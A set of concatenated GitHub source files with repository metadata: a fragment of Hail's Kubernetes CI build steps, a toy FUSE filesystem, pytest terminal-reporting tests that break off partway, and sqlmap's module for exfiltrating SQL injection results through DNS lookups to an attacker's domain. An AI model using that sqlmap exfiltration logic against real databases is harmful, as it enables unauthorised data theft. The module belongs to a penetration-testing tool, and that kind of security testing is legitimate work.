name: {admin_service_account_name}-{self.namespace_name}-admin-binding
namespace: {self._name}
subjects:
- kind: ServiceAccount
name: {admin_service_account_name}
namespace: {admin_service_account_namespace}
roleRef:
kind: Role
name: {self.namespace_name}-admin
apiGroup: ""
'''
if self.public:
config = config + '''\
---
apiVersion: v1
kind: Service
metadata:
name: router
labels:
app: router
spec:
ports:
- name: http
port: 80
protocol: TCP
targetPort: 80
selector:
app: router
'''
script = f'''
set -ex
date
echo {shq(config)} | kubectl apply -f -
'''
if self.secrets and not scope == 'deploy':
for s in self.secrets:
script += f'''
kubectl -n {self.namespace_name} get -o json --export secret {s} | jq '.metadata.name = "{s}"' | kubectl -n {self._name} apply -f -
'''
script += '''
date
'''
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
attributes={'name': self.name},
# FIXME configuration
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
parents=self.deps_parents(),
network='private')
def cleanup(self, batch, scope, parents):
if scope in ['deploy', 'dev'] or is_test_deployment:
return
script = f'''
set -x
date
until kubectl delete namespace --ignore-not-found=true {self._name}
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
date
true
'''
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
attributes={'name': f'cleanup_{self.name}'},
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
parents=parents,
always_run=True,
network='private')
class DeployStep(Step):
def __init__(self, params, namespace, config_file, link, wait): # pylint: disable=unused-argument
super().__init__(params)
self.namespace = get_namespace(namespace, self.input_config(params.code, params.scope))
self.config_file = config_file
self.link = link
self.wait = wait
self.job = None
def wrapped_job(self):
if self.job:
return [self.job]
return []
@staticmethod
def from_json(params):
json = params.json
return DeployStep(params,
json['namespace'],
# FIXME config_file
json['config'],
json.get('link'),
json.get('wait'))
def config(self, scope): # pylint: disable=unused-argument
return {
'token': self.token
}
def build(self, batch, code, scope):
with open(f'{code.repo_dir()}/{self.config_file}', 'r') as f:
template = jinja2.Template(f.read(), undefined=jinja2.StrictUndefined, trim_blocks=True, lstrip_blocks=True)
rendered_config = template.render(**self.input_config(code, scope))
script = '''\
set -ex
date
'''
if self.wait:
for w in self.wait:
if w['kind'] == 'Pod':
script += f'''\
kubectl -n {self.namespace} delete --ignore-not-found pod {w['name']}
'''
script += f'''
echo {shq(rendered_config)} | kubectl -n {self.namespace} apply -f -
'''
if self.wait:
for w in self.wait:
name = w['name']
if w['kind'] == 'Deployment':
assert w['for'] == 'available', w['for']
# FIXME what if the cluster isn't big enough?
script += f'''
set +e
kubectl -n {self.namespace} rollout status --timeout=1h deployment {name} && \
kubectl -n {self.namespace} wait --timeout=1h --for=condition=available deployment {name}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''
elif w['kind'] == 'Service':
assert w['for'] == 'alive', w['for']
resource_type = w.get('resource_type', 'deployment').lower()
timeout = w.get('timeout', 60)
if resource_type == 'statefulset':
wait_cmd = f'kubectl -n {self.namespace} wait --timeout=1h --for=condition=ready pods --selector=app={name}'
else:
assert resource_type == 'deployment'
wait_cmd = f'kubectl -n {self.namespace} wait --timeout=1h --for=condition=available deployment {name}'
script += f'''
set +e
kubectl -n {self.namespace} rollout status --timeout=1h {resource_type} {name} && \
{wait_cmd}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''
else:
assert w['kind'] == 'Pod', w['kind']
assert w['for'] == 'completed', w['for']
timeout = w.get('timeout', 300)
script += f'''
set +e
kubectl -n {self.namespace} wait --timeout=1h pod --for=condition=podscheduled {name} \
&& python3 wait-for.py {timeout} {self.namespace} Pod {name}
EC=$?
kubectl -n {self.namespace} logs --tail=999999 {name} --all-containers=true | {pretty_print_log}
set -e
(exit $EC)
'''
script += '''
date
'''
attrs = {'name': self.name}
if self.link is not None:
attrs['link'] = ','.join(self.link)
attrs['domain'] = f'{self.namespace}.internal.{DOMAIN}'
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
attributes=attrs,
# FIXME configuration
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
parents=self.deps_parents(),
network='private')
def cleanup(self, batch, scope, parents): # pylint: disable=unused-argument
if self.wait:
script = ''
for w in self.wait:
name = w['name']
if w['kind'] == 'Deployment':
script += f'kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}\n'
elif w['kind'] == 'Service':
assert w['for'] == 'alive', w['for']
script += f'kubectl -n {self.namespace} logs --tail=999999 -l app={name} --all-containers=true | {pretty_print_log}\n'
else:
assert w['kind'] == 'Pod', w['kind']
script += f'kubectl -n {self.namespace} logs --tail=999999 {name} --all-containers=true | {pretty_print_log}\n'
script += 'date\n'
self.job = batch.create_job(CI_UTILS_IMAGE,
command=['bash', '-c', script],
attributes={'name': self.name + '_logs'},
# FIXME configuration
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
parents=parents,
always_run=True,
network='private')
class CreateDatabaseStep(Step):
def __init__(self, params, database_name, namespace, migrations, shutdowns, inputs):
super().__init__(params)
config = self.input_config(params.code, params.scope)
# FIXME validate
self.database_name = database_name
self.namespace = get_namespace(namespace, config)
self.migrations = migrations
for s in shutdowns:
s['namespace'] = get_namespace(s['namespace'], config)
self.shutdowns = shutdowns
self.inputs = inputs
self.create_passwords_job = None
self.create_database_job = None
self.cleanup_job = None
if params.scope == 'dev':
self.database_server_config_namespace = params.code.namespace
else:
self.database_server_config_namespace = DEFAULT_NAMESPACE
self.cant_create_database = is_test_deployment or params.scope == 'dev'
# MySQL user name can be up to 16 characters long before MySQL 5.7.8 (32 after)
if self.cant_create_database:
self._name = None
self.admin_username = None
self.user_username = None
elif params.scope == 'deploy':
self._name = database_name
self.admin_username = f'{database_name}-admin'
self.user_username = f'{database_name}-user'
else:
assert params.scope == 'test'
self._name = f'{params.code.short_str()}-{database_name}-{self.token}'
self.admin_username = generate_token()
self.user_username = generate_token()
self.admin_password_file = f'/io/{self.admin_username}.pwd'
self.user_password_file = f'/io/{self.user_username}.pwd'
self.admin_secret_name = f'sql-{self.database_name}-admin-config'
self.user_secret_name = f'sql-{self.database_name}-user-config'
def wrapped_job(self):
if self.cleanup_job:
return [self.cleanup_job]
if self.create_passwords_job:
assert self.create_database_job is not None
return [self.create_passwords_job, self.create_database_job]
if self.create_database_job:
return [self.create_database_job]
return []
@staticmethod
def from_json(params):
json = params.json
return CreateDatabaseStep(params,
json['databaseName'],
json['namespace'],
json['migrations'],
json.get('shutdowns', []),
json.get('inputs'))
def config(self, scope): # pylint: disable=unused-argument
return {
'token': self.token,
'admin_secret_name': self.admin_secret_name,
'user_secret_name': self.user_secret_name
}
def build(self, batch, code, scope): # pylint: disable=unused-argument
create_database_config = {
'namespace': self.namespace,
'scope': scope,
'database_name': self.database_name,
'_name': self._name,
'admin_username': self.admin_username,
'user_username': self.user_username,
'admin_password_file': self.admin_password_file,
'user_password_file': self.user_password_file,
'cant_create_database': self.cant_create_database,
'migrations': self.migrations,
'shutdowns': self.shutdowns
}
create_passwords_script = f'''
set -ex
LC_ALL=C tr -dc '[:alnum:]' </dev/urandom | head -c 16 > {self.admin_password_file}
LC_ALL=C tr -dc '[:alnum:]' </dev/urandom | head -c 16 > {self.user_password_file}
'''
create_database_script = f'''
set -ex
create_database_config={shq(json.dumps(create_database_config, indent=2))}
python3 create_database.py <<EOF
$create_database_config
EOF
'''
input_files = []
if self.inputs:
for i in self.inputs:
input_files.append((f'gs://{BUCKET}/build/{batch.attributes["token"]}{i["from"]}', i["to"]))
if not self.cant_create_database:
password_files_input = [
(f'gs://{BUCKET}/build/{batch.attributes["token"]}/{self.admin_password_file}', self.admin_password_file),
(f'gs://{BUCKET}/build/{batch.attributes["token"]}/{self.user_password_file}', self.user_password_file)]
input_files.extend(password_files_input)
self.create_passwords_job = batch.create_job(
CI_UTILS_IMAGE,
command=['bash', '-c', create_passwords_script],
attributes={'name': self.name + "_create_passwords"},
output_files=[(x[1], x[0]) for x in password_files_input],
parents=self.deps_parents())
self.create_database_job = batch.create_job(
CI_UTILS_IMAGE,
command=['bash', '-c', create_database_script],
attributes={'name': self.name},
secrets=[{
'namespace': self.database_server_config_namespace,
'name': 'database-server-config',
'mount_path': '/sql-config'
}],
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
input_files=input_files,
parents=[self.create_passwords_job] if self.create_passwords_job else self.deps_parents(),
network='private')
def cleanup(self, batch, scope, parents):
if scope in ['deploy', 'dev'] or self.cant_create_database:
return
cleanup_script = f'''
set -ex
commands=$(mktemp)
cat >$commands <<EOF
DROP DATABASE IF EXISTS \\`{self._name}\\`;
DROP USER IF EXISTS '{self.admin_username}';
DROP USER IF EXISTS '{self.user_username}';
EOF
until mysql --defaults-extra-file=/sql-config/sql-config.cnf <$commands
do
echo 'failed, will sleep 2 and retry'
sleep 2
done
'''
self.cleanup_job = batch.create_job(
CI_UTILS_IMAGE,
command=['bash', '-c', cleanup_script],
attributes={'name': f'cleanup_{self.name}'},
secrets=[{
'namespace': self.database_server_config_namespace,
'name': 'database-server-config',
'mount_path': '/sql-config'
}],
service_account={
'namespace': BATCH_PODS_NAMESPACE,
'name': 'ci-agent'
},
parents=parents,
always_run=True,
network='private')
| {
"content_hash": "51227d223954ddc980b907bd6aeae300",
"timestamp": "",
"source": "github",
"line_count": 1011,
"max_line_length": 162,
"avg_line_length": 34.196834817012856,
"alnum_prop": 0.532091516501316,
"repo_name": "cseed/hail",
"id": "516853316b22a4ee2b76ae13990bb6ccb2ec7428",
"size": "34573",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ci/ci/build.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7729"
},
{
"name": "C",
"bytes": "289"
},
{
"name": "C++",
"bytes": "170210"
},
{
"name": "CSS",
"bytes": "20423"
},
{
"name": "Dockerfile",
"bytes": "7426"
},
{
"name": "HTML",
"bytes": "43106"
},
{
"name": "Java",
"bytes": "22564"
},
{
"name": "JavaScript",
"bytes": "730"
},
{
"name": "Jupyter Notebook",
"bytes": "162397"
},
{
"name": "Makefile",
"bytes": "58348"
},
{
"name": "PLpgSQL",
"bytes": "23163"
},
{
"name": "Python",
"bytes": "3477764"
},
{
"name": "R",
"bytes": "3038"
},
{
"name": "Scala",
"bytes": "3496240"
},
{
"name": "Shell",
"bytes": "41254"
},
{
"name": "TSQL",
"bytes": "10385"
},
{
"name": "TeX",
"bytes": "7125"
},
{
"name": "XSLT",
"bytes": "9787"
}
],
"symlink_target": ""
} |
"""
TestFS
An ongoing attempt at learning by doing with Python-FUSE
Copyright (c) 2012 Sean Harlow (firstname) at (firstname)(lastname) dot info
Released under the BSD license, see COPYING file for info.
"""
import errno, fuse, stat, time
import logging as log
# Setup FUSE
fuse.fuse_python_api = (0, 2)
# Setup logging
log.basicConfig(level=log.DEBUG)
directories = ['/', '/testdir1', '/testdir2', '/testdir3', '/testdir1/testsubdir']
files = ['/file1.txt', '/file2.txt', '/testdir2/file3.txt']
dummytext = 'This is a dummy file in a TestFS filesystem. All files on the system will return this text.'
class EmptyStat(fuse.Stat):
def __init__(self):
self.st_mode = 0
self.st_ino = 0
self.st_dev = 0
self.st_nlink = 0
self.st_uid = 0
self.st_gid = 0
self.st_size = 0
self.st_atime = int(time.time())
self.st_mtime = 0
self.st_ctime = 0
class TestFS(fuse.Fuse):
def __init__(self, *args, **kw):
log.info('Initializing FUSE')
fuse.Fuse.__init__(self, *args, **kw)
log.info('Initializing TestFS')
def getattr(self, path):
log.info('getattr %s', path)
st = EmptyStat()
# Check above lists for dummy files/folders
if path in directories:
log.debug('%s is a directory', path)
st.st_mode = stat.S_IFDIR | 0755
st.st_nlink = 2
elif path in files:
log.debug('%s is a file', path)
st.st_mode = stat.S_IFREG | 0644
st.st_nlink = 1
st.st_size = len(dummytext)
return st
def readdir(self, path, offset):
log.info('readdir %s, %i', path, offset)
# The basics
yield fuse.Direntry('.')
yield fuse.Direntry('..')
# Create a new blank list
entrylist = []
# Get file list
for file in files:
if (file.startswith(path)) & (len(file.split('/')) == len(path.split('/'))):
log.debug('Matched file %s', file)
entrylist.append(file[len(path):])
# Get directory list
for directory in directories:
if (directory.startswith(path)) & (len(directory.split('/')) == len(path.split('/'))) & (directory != path):
log.debug('Matched directory %s', directory)
entrylist.append(directory[len(path):])
# Sort it
entrylist.sort()
for entry in entrylist:
yield fuse.Direntry(entry)
if __name__ == '__main__':
fs = TestFS()
fs.parse(errex=1)
fs.main() | {
"content_hash": "898daa6efda69dfe13469eac5f89094c",
"timestamp": "",
"source": "github",
"line_count": 82,
"max_line_length": 111,
"avg_line_length": 28.329268292682926,
"alnum_prop": 0.6289281102023245,
"repo_name": "wolrah/TestFS",
"id": "13cf1ad4cb97b25f30ddfb36cbb8d1c2440fd576",
"size": "2346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testfs.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "3114"
}
],
"symlink_target": ""
} |
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import time
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult
from lib.core.common import getSQLSnippet
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import queries
from lib.core.enums import DBMS
from lib.core.settings import DNS_BOUNDARIES_ALPHABET
from lib.core.settings import MAX_DNS_LABEL
from lib.core.settings import PARTIAL_VALUE_MARKER
from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request
def dnsUse(payload, expression):
"""
Retrieve the output of a SQL query taking advantage of the DNS
resolution mechanism by making request back to attacker's machine.
"""
start = time.time()
retVal = None
count = 0
offset = 1
if conf.dnsName and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
output = hashDBRetrieve(expression, checkConf=True)
if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
output = None
if output is None:
kb.dnsMode = True
while True:
count += 1
prefix, suffix = ("%s" % randomStr(length=3, alphabet=DNS_BOUNDARIES_ALPHABET) for _ in xrange(2))
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
if extendedField != fieldToCastStr: # e.g. MIN(surname)
nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
fieldToCastStr = extendedField
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
nulledCastedField = agent.hexConvertField(nulledCastedField)
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
expressionRequest = getSQLSnippet(Backend.getIdentifiedDbms(), "dns_request", PREFIX=prefix, QUERY=expressionReplaced, SUFFIX=suffix, DOMAIN=conf.dnsName)
expressionUnescaped = unescaper.escape(expressionRequest)
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
query = agent.prefixQuery("; %s" % expressionUnescaped)
query = "%s%s" % (query, queries[Backend.getIdentifiedDbms()].comment.query)
forgedPayload = agent.payload(newValue=query)
else:
forgedPayload = safeStringFormat(payload, (expressionUnescaped, randomInt(1), randomInt(3)))
Request.queryPage(forgedPayload, content=False, noteResponseTime=False, raise404=False)
_ = conf.dnsServer.pop(prefix, suffix)
if _:
_ = extractRegexResult("%s\.(?P<result>.+)\.%s" % (prefix, suffix), _, re.I)
_ = decodeHexValue(_)
output = (output or "") + _
offset += len(_)
if len(_) < chunk_length:
break
else:
break
output = decodeHexValue(output) if conf.hexConvert else output
kb.dnsMode = False
if output is not None:
retVal = output
if kb.dnsTest is not None:
dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))
if count > 0:
hashDBWrite(expression, output)
if not kb.bruteMode:
debugMsg = "performed %d queries in %.2f seconds" % (count, calculateDeltaSeconds(start))
logger.debug(debugMsg)
elif conf.dnsName:
warnMsg = "DNS data exfiltration method through SQL injection "
warnMsg += "is currently not available for DBMS %s" % Backend.getIdentifiedDbms()
singleTimeWarnMessage(warnMsg)
return safecharencode(retVal) if kb.safeCharEncode else retVal
| {
"content_hash": "4033bdb9e6973ee814fb68d3cf9e710c",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 170,
"avg_line_length": 42.41025641025641,
"alnum_prop": 0.6473196291817815,
"repo_name": "glaudsonml/kurgan-ai",
"id": "1e4216ef342fb1426415dca6acfad41e557126d3",
"size": "4985",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/sqlmap/lib/techniques/dns/use.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "122729"
},
{
"name": "HTML",
"bytes": "48894"
},
{
"name": "JavaScript",
"bytes": "1589671"
},
{
"name": "PHP",
"bytes": "72064"
},
{
"name": "Python",
"bytes": "211839"
},
{
"name": "Shell",
"bytes": "5722"
}
],
"symlink_target": ""
} |
"""Terminal reporting of the full testing process."""
import collections
import os
import sys
import textwrap
from io import StringIO
from pathlib import Path
from types import SimpleNamespace
from typing import cast
from typing import Dict
from typing import List
from typing import Tuple
import pluggy
import _pytest.config
import _pytest.terminal
import pytest
from _pytest._io.wcwidth import wcswidth
from _pytest.config import Config
from _pytest.config import ExitCode
from _pytest.monkeypatch import MonkeyPatch
from _pytest.pytester import Pytester
from _pytest.reports import BaseReport
from _pytest.reports import CollectReport
from _pytest.reports import TestReport
from _pytest.terminal import _folded_skips
from _pytest.terminal import _format_trimmed
from _pytest.terminal import _get_line_with_reprcrash_message
from _pytest.terminal import _get_raw_skip_reason
from _pytest.terminal import _plugin_nameversions
from _pytest.terminal import getreportopt
from _pytest.terminal import TerminalReporter
DistInfo = collections.namedtuple("DistInfo", ["project_name", "version"])
TRANS_FNMATCH = str.maketrans({"[": "[[]", "]": "[]]"})
class Option:
def __init__(self, verbosity=0):
self.verbosity = verbosity
@property
def args(self):
values = []
values.append("--verbosity=%d" % self.verbosity)
return values
@pytest.fixture(
params=[Option(verbosity=0), Option(verbosity=1), Option(verbosity=-1)],
ids=["default", "verbose", "quiet"],
)
def option(request):
return request.param
@pytest.mark.parametrize(
"input,expected",
[
([DistInfo(project_name="test", version=1)], ["test-1"]),
([DistInfo(project_name="pytest-test", version=1)], ["test-1"]),
(
[
DistInfo(project_name="test", version=1),
DistInfo(project_name="test", version=1),
],
["test-1"],
),
],
ids=["normal", "prefix-strip", "deduplicate"],
)
def test_plugin_nameversion(input, expected):
pluginlist = [(None, x) for x in input]
result = _plugin_nameversions(pluginlist)
assert result == expected
class TestTerminal:
def test_pass_skip_fail(self, pytester: Pytester, option) -> None:
pytester.makepyfile(
"""
import pytest
def test_ok():
pass
def test_skip():
pytest.skip("xx")
def test_func():
assert 0
"""
)
result = pytester.runpytest(*option.args)
if option.verbosity > 0:
result.stdout.fnmatch_lines(
[
"*test_pass_skip_fail.py::test_ok PASS*",
"*test_pass_skip_fail.py::test_skip SKIP*",
"*test_pass_skip_fail.py::test_func FAIL*",
]
)
elif option.verbosity == 0:
result.stdout.fnmatch_lines(["*test_pass_skip_fail.py .sF*"])
else:
result.stdout.fnmatch_lines([".sF*"])
result.stdout.fnmatch_lines(
[" def test_func():", "> assert 0", "E assert 0"]
)
def test_internalerror(self, pytester: Pytester, linecomp) -> None:
modcol = pytester.getmodulecol("def test_one(): pass")
rep = TerminalReporter(modcol.config, file=linecomp.stringio)
with pytest.raises(ValueError) as excinfo:
raise ValueError("hello")
rep.pytest_internalerror(excinfo.getrepr())
linecomp.assert_contains_lines(["INTERNALERROR> *ValueError*hello*"])
def test_writeline(self, pytester: Pytester, linecomp) -> None:
modcol = pytester.getmodulecol("def test_one(): pass")
rep = TerminalReporter(modcol.config, file=linecomp.stringio)
rep.write_fspath_result(modcol.nodeid, ".")
rep.write_line("hello world")
lines = linecomp.stringio.getvalue().split("\n")
assert not lines[0]
assert lines[1].endswith(modcol.name + " .")
assert lines[2] == "hello world"
def test_show_runtest_logstart(self, pytester: Pytester, linecomp) -> None:
item = pytester.getitem("def test_func(): pass")
tr = TerminalReporter(item.config, file=linecomp.stringio)
item.config.pluginmanager.register(tr)
location = item.reportinfo()
tr.config.hook.pytest_runtest_logstart(
nodeid=item.nodeid, location=location, fspath=str(item.path)
)
linecomp.assert_contains_lines(["*test_show_runtest_logstart.py*"])
def test_runtest_location_shown_before_test_starts(
self, pytester: Pytester
) -> None:
pytester.makepyfile(
"""
def test_1():
import time
time.sleep(20)
"""
)
child = pytester.spawn_pytest("")
child.expect(".*test_runtest_location.*py")
child.sendeof()
child.kill(15)
def test_report_collect_after_half_a_second(
self, pytester: Pytester, monkeypatch: MonkeyPatch
) -> None:
"""Test for "collecting" being updated after 0.5s"""
pytester.makepyfile(
**{
"test1.py": """
import _pytest.terminal
_pytest.terminal.REPORT_COLLECTING_RESOLUTION = 0
def test_1():
pass
""",
"test2.py": "def test_2(): pass",
}
)
# Explicitly test colored output.
monkeypatch.setenv("PY_COLORS", "1")
child = pytester.spawn_pytest("-v test1.py test2.py")
child.expect(r"collecting \.\.\.")
child.expect(r"collecting 1 item")
child.expect(r"collecting 2 items")
child.expect(r"collected 2 items")
rest = child.read().decode("utf8")
assert "= \x1b[32m\x1b[1m2 passed\x1b[0m\x1b[32m in" in rest
def test_itemreport_subclasses_show_subclassed_file(
self, pytester: Pytester
) -> None:
pytester.makepyfile(
**{
"tests/test_p1": """
class BaseTests(object):
fail = False
def test_p1(self):
if self.fail: assert 0
""",
"tests/test_p2": """
from test_p1 import BaseTests
class TestMore(BaseTests): pass
""",
"tests/test_p3.py": """
from test_p1 import BaseTests
BaseTests.fail = True
class TestMore(BaseTests): pass
""",
}
)
result = pytester.runpytest("tests/test_p2.py", "--rootdir=tests")
result.stdout.fnmatch_lines(["tests/test_p2.py .*", "=* 1 passed in *"])
result = pytester.runpytest("-vv", "-rA", "tests/test_p2.py", "--rootdir=tests")
result.stdout.fnmatch_lines(
[
"tests/test_p2.py::TestMore::test_p1 <- test_p1.py PASSED *",
"*= short test summary info =*",
"PASSED tests/test_p2.py::TestMore::test_p1",
]
)
result = pytester.runpytest("-vv", "-rA", "tests/test_p3.py", "--rootdir=tests")
result.stdout.fnmatch_lines(
[
"tests/test_p3.py::TestMore::test_p1 <- test_p1.py FAILED *",
"*_ TestMore.test_p1 _*",
" def test_p1(self):",
"> if self.fail: assert 0",
"E assert 0",
"",
"tests/test_p1.py:5: AssertionError",
"*= short test summary info =*",
"FAILED tests/test_p3.py::TestMore::test_p1 - assert 0",
"*= 1 failed in *",
]
)
def test_itemreport_directclasses_not_shown_as_subclasses(
self, pytester: Pytester
) -> None:
a = pytester.mkpydir("a123")
a.joinpath("test_hello123.py").write_text(
textwrap.dedent(
"""\
class TestClass(object):
def test_method(self):
pass
"""
)
)
result = pytester.runpytest("-vv")
assert result.ret == 0
result.stdout.fnmatch_lines(["*a123/test_hello123.py*PASS*"])
result.stdout.no_fnmatch_line("* <- *")
@pytest.mark.parametrize("fulltrace", ("", "--fulltrace"))
def test_keyboard_interrupt(self, pytester: Pytester, fulltrace) -> None:
pytester.makepyfile(
"""
def test_foobar():
assert 0
def test_spamegg():
import py; pytest.skip('skip me please!')
def test_interrupt_me():
raise KeyboardInterrupt # simulating the user
"""
)
result = pytester.runpytest(fulltrace, no_reraise_ctrlc=True)
result.stdout.fnmatch_lines(
[
" def test_foobar():",
"> assert 0",
"E assert 0",
"*_keyboard_interrupt.py:6: KeyboardInterrupt*",
]
)
if fulltrace:
result.stdout.fnmatch_lines(
["*raise KeyboardInterrupt # simulating the user*"]
)
else:
result.stdout.fnmatch_lines(
["(to show a full traceback on KeyboardInterrupt use --full-trace)"]
)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
def test_keyboard_in_sessionstart(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""
def pytest_sessionstart():
raise KeyboardInterrupt
"""
)
pytester.makepyfile(
"""
def test_foobar():
pass
"""
)
result = pytester.runpytest(no_reraise_ctrlc=True)
assert result.ret == 2
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
def test_collect_single_item(self, pytester: Pytester) -> None:
"""Use singular 'item' when reporting a single test item"""
pytester.makepyfile(
"""
def test_foobar():
pass
"""
)
result = pytester.runpytest()
result.stdout.fnmatch_lines(["collected 1 item"])
def test_rewrite(self, pytester: Pytester, monkeypatch) -> None:
config = pytester.parseconfig()
f = StringIO()
monkeypatch.setattr(f, "isatty", lambda *args: True)
tr = TerminalReporter(config, f)
tr._tw.fullwidth = 10
tr.write("hello")
tr.rewrite("hey", erase=True)
assert f.getvalue() == "hello" + "\r" + "hey" + (6 * " ")
def test_report_teststatus_explicit_markup(
self, monkeypatch: MonkeyPatch, pytester: Pytester, color_mapping
) -> None:
"""Test that TerminalReporter handles markup explicitly provided by
a pytest_report_teststatus hook."""
monkeypatch.setenv("PY_COLORS", "1")
pytester.makeconftest(
"""
def pytest_report_teststatus(report):
return 'foo', 'F', ('FOO', {'red': True})
"""
)
pytester.makepyfile(
"""
def test_foobar():
pass
"""
)
result = pytester.runpytest("-v")
result.stdout.fnmatch_lines(
color_mapping.format_for_fnmatch(["*{red}FOO{reset}*"])
)
def test_verbose_skip_reason(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
import pytest
@pytest.mark.skip(reason="123")
def test_1():
pass
@pytest.mark.xfail(reason="456")
def test_2():
pass
@pytest.mark.xfail(reason="789")
def test_3():
assert False
@pytest.mark.xfail(reason="")
def test_4():
assert False
@pytest.mark.skip
def test_5():
pass
@pytest.mark.xfail
def test_6():
pass
def test_7():
pytest.skip()
def test_8():
pytest.skip("888 is great")
def test_9():
pytest.xfail()
def test_10():
pytest.xfail("It's 🕙 o'clock")
@pytest.mark.skip(
reason="cannot do foobar because baz is missing due to I don't know what"
)
def test_long_skip():
pass
@pytest.mark.xfail(
reason="cannot do foobar because baz is missing due to I don't know what"
)
def test_long_xfail():
print(1 / 0)
"""
)
common_output = [
"test_verbose_skip_reason.py::test_1 SKIPPED (123) *",
"test_verbose_skip_reason.py::test_2 XPASS (456) *",
"test_verbose_skip_reason.py::test_3 XFAIL (789) *",
"test_verbose_skip_reason.py::test_4 XFAIL *",
"test_verbose_skip_reason.py::test_5 SKIPPED (unconditional skip) *",
"test_verbose_skip_reason.py::test_6 XPASS *",
"test_verbose_skip_reason.py::test_7 SKIPPED *",
"test_verbose_skip_reason.py::test_8 SKIPPED (888 is great) *",
"test_verbose_skip_reason.py::test_9 XFAIL *",
"test_verbose_skip_reason.py::test_10 XFAIL (It's 🕙 o'clock) *",
]
result = pytester.runpytest("-v")
result.stdout.fnmatch_lines(
common_output
+ [
"test_verbose_skip_reason.py::test_long_skip SKIPPED (cannot *...) *",
"test_verbose_skip_reason.py::test_long_xfail XFAIL (cannot *...) *",
]
)
result = pytester.runpytest("-vv")
result.stdout.fnmatch_lines(
common_output
+ [
(
"test_verbose_skip_reason.py::test_long_skip SKIPPED"
" (cannot do foobar because baz is missing due to I don't know what) *"
),
(
"test_verbose_skip_reason.py::test_long_xfail XFAIL"
" (cannot do foobar because baz is missing due to I don't know what) *"
),
]
)
class TestCollectonly:
def test_collectonly_basic(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
def test_func():
pass
"""
)
result = pytester.runpytest("--collect-only")
result.stdout.fnmatch_lines(
["<Module test_collectonly_basic.py>", " <Function test_func>"]
)
def test_collectonly_skipped_module(self, pytester: Pytester) -> None:
pytester.makepyfile(
"""
import pytest
pytest.skip("hello")
"""
)
result = pytester.runpytest("--collect-only", "-rs")
result.stdout.fnmatch_lines(["*ERROR collecting*"])
def test_collectonly_displays_test_description(
self, pytester: Pytester, dummy_yaml_custom_test
) -> None:
"""Used dummy_yaml_custom_test for an Item without ``obj``."""
pytester.makepyfile(
"""
def test_with_description():
''' This test has a description.
more1.
more2.'''
"""
)
result = pytester.runpytest("--collect-only", "--verbose")
result.stdout.fnmatch_lines(
[
"<YamlFile test1.yaml>",
" <YamlItem test1.yaml>",
"<Module test_collectonly_displays_test_description.py>",
" <Function test_with_description>",
" This test has a description.",
" ",
" more1.",
" more2.",
],
consecutive=True,
)
def test_collectonly_failed_module(self, pytester: Pytester) -> None:
pytester.makepyfile("""raise ValueError(0)""")
result = pytester.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*raise ValueError*", "*1 error*"])
def test_collectonly_fatal(self, pytester: Pytester) -> None:
pytester.makeconftest(
"""
def pytest_collectstart(collector):
assert 0, "urgs"
"""
)
result = pytester.runpytest("--collect-only")
result.stdout.fnmatch_lines(["*INTERNAL*args*"])
assert result.ret == 3
def test_collectonly_simple(self, pytester: Pytester) -> None:
p = pytester.makepyfile(
"""
def test_func1():
pass
class TestClass(object):
